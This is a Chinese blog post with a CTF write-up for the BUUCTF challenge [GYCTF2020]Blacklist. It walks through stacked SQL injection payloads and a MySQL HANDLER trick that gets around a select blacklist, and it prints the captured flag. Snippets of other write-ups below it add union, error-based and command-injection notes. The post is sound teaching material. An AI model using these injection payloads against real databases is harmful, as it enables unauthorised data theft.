[GYCTF2020]Blacklist 1

已于 2022-07-20 09:26:21 修改
阅读量68 收藏
点赞数
文章标签: 大数据
于 2022-07-03 11:01:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43618536/article/details/125582020
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

[GYCTF2020]Blacklist 1

题目

BUUCTF的[GYCTF2020]Blacklist 1
在这里插入图片描述

一、做题步骤

1.测试

1.输入1
在这里插入图片描述
2.输入1’
在这里插入图片描述3.输入select,跳出过滤的代码

在这里插入图片描述

2.注入

1.爆数据库

?inject=1’;show databases;

在这里插入图片描述

2.爆表名

?inject=1’;show tables;

在这里插入图片描述
3.爆字段

?inject=1’;show columns from FlagHere;

在这里插入图片描述
4.爆数据

?inject=1’;show flag from ctftraining.FlagHere;

在这里插入图片描述因为.被过滤了,所以要换一种读取方式

handler方式读取flag

?inject=1’;handler FlagHere open;handler FlagHere read first;

在这里插入图片描述
5.获取flag
flag{debee35c-b3ef-4bba-afa8-79cd81658d63}

林本
关注
[GYCTF2020]Blacklist 1(详细做题过程)
lunan的博客
05-24 2781
[GYCTF2020]Blacklist 1(详细做题过程) 文章目录[GYCTF2020]Blacklist 1(详细做题过程)1、考点2、解题过程1、寻找`注入点`2、尝试`堆叠注入`3、尝试`联合注入`4、尝试`双写绕过`5、尝试`大小写绕过`6、传统方法行不通,看别人的wp中提到了`Handler`3、Handler语法 1、考点 1、堆叠注入 2、 Handler语法 心得:学会新的姿势Handler的sql查询方法 2、解题过程 1、寻找注入点 http://3c6e5317-cd37-4
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询
weixin_44632787的博客
06-19 728
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询 启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it 又是一道用堆叠查询的题目,看来CTF也很喜欢考这类型的题目呀! 首先爆出数据库:1’;show databases; 然后爆出表名:1’; show tables; 然后显示某个表里面列的信息:1’;show columns from FlagHere; 接下来的才是重点,在MYSQL数据库中: 可以用handl
[GYCTF2020]Blacklist1
最新发布
kw741951的博客
08-01 213
重新构造payload:0';然后我们通过FlagHere表来查看列输入2';判断注入类型,输入1试试。
[GYCTF2020]Blacklist 1+[GXYCTF2019]BabySQli 1
bazzza的博客
12-23 315
blacklist 拿到题先试下能不能注入 ?inject=1%27%20or%201=1%20--%20q 存在注入,接着使用order by判断字段,发现字段数为2,但在接一步的注入中,出现提示,遇到阻拦。 这个地方使用正则过滤了一些关键字,在尝试绕过的时候也失败了,但是他这个地方没有过滤 ; 和extractxml(),可以先报错注入拿到库名,然后再进行堆叠注入,(直接用show database()会分不清是哪个表) 报错注入报当前库名 ?inject=1%27%20and%20extract
BUUCTF-WEB-[GYCTF2020]Blacklist
r1727337824的博客
08-29 835
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">
BUUCTF系列 // [GXYCTF2019] Ping Ping Ping
qq_45805420的博客
10-01 431
前言 本题知识点:命令执行漏洞 WP 打开题目页面,提示很明显,那就先随便 ping 个 IP 地址看看效果 可以看到系统命令被正常执行了,有正确回显 接下来尝试一下是否存在命令执行漏洞,首先用 ls 试一试,看看有没有提示 flag 所在的位置 发现确实存在着命令执行,并且得到了新的线索 先试着直接用 cat 命令读取 flag.php 文件的内容 题目报了个错,(初看没太明白这个提示,后来结合其他的报错,意识到此处原因为空格被过滤了) 既然题目过滤了空格,那就用绕过试试呗 PS:命令执行漏洞,绕过
BUU实战笔记——[GYCTF2020]Blacklist 1
qq_51175992的博客
10-26 185
这题主要考察的是绕过黑名单,当select被过滤之后我们应该考虑其他方法进行查看,这里是利用了堆叠注入,我们需要注意堆叠注入的条件以及当没有select时可以采用Handler命令进行查询。
buuctf-web-[GYCTF2020]Blacklist1
mlws1900的博客
08-11 382
MySQL 除了可以使用 select 查询表中的数据,也可使用 handler 语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler 语句并不具备 select 语句的所有功能。它是 MySQL 专用的语句,并没有包含到SQL标准中。words表里有两个属性,即两列:id 和data,而FlagHere表里只有一个属性列,说明输入框可能查询的就是words表。换句话说我们没有办法像之前那样将 flaghere这个表改名为words(之前做过一题类似的)OPEN语句打开一个表。...
web buuctf [GYCTF2020]Blacklist1
weixin_44214568的博客
03-18 1177
考点:堆叠注入;mysql查询语句handler 1.进行注入测试: 注入1' 提示语法错误; 注入1' or '1=1'# 返回表数据,有回显,存在字符型可注入漏洞; 2.联合查询:1' union select 1# 回显过滤 3.根据过滤事项,应该是堆叠查询 a.1'; show tables;# b.1';show columns from FlagHere;# 4.因为存在较多的过滤,利用Mysql数据库中的查询语法handler mysql除可使用se..
[GYCTF2020]Blacklist 1详解(handler命令用法!)
m0_73734159的博客
12-01 1114
果不其然改表名的两个关键命令被过滤了。select这个查询命令大家都很熟悉。但是我们却忽略了一个也很重要的角色。虽然handler这个命令不常见。那就是handler查询命令。存在FlagHere数据表。极有可能当中存在flag。rename和alter。包括查询命令也被过滤了。可知本题是字符型注入。
buuctf-[GYCTF2020]Blacklist1(小宇特详解)
小宇的web博客
02-09 1676
buuctf-[GYCTF2020]Blacklist1(小宇特详解) 1.先看题目是一道sql注入的题目 先尝试进行闭合 payload:1’ 这里可以试出来是'来进行闭合即可 2.然后尝试着进行联合查询 发现是进行了过滤。 3.这里尝试着进行堆叠注入 payload:1’;show tables;# 4.查表 payload:1’; show columns from FlagHere;# 这里屏蔽了许多东西 5.这里由于rename,和alter被过滤了,这里考虑利用HANDLER语句 这里
Android平台通信Blacklist服务设计及实战开发
本篇论文深入探讨了在Android平台下通信Blacklist服务的设计与实现。作者徐鹏,信息工程学院通信工程专业,学号20084882,在导师马强讲师和乌日娜讲师的指导下完成。随着移动设备技术的快速发展,智能手机已超越传统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值